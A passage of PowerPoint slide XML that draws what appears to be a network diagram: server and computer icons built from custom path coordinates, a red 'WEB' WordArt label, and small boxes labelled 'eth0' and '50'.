                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FDABC20-715F-2687-E2E3-5DC745034275}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB510834-2761-7C64-4FE9-538E3783D539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5525825" y="1967277"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4CF0640-64A9-0A5F-372C-2966C45A4F20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04D1FD40-F458-F6E4-CA20-55D822CE3041}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Gruppo 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD3761D9-172C-C26E-22FA-86373A1A23A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2150227" y="4015813"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A6A9E32-42BB-14B4-2F4E-7B03FF459655}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23DD2191-4E2A-6512-187E-CF95DFAA0B72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
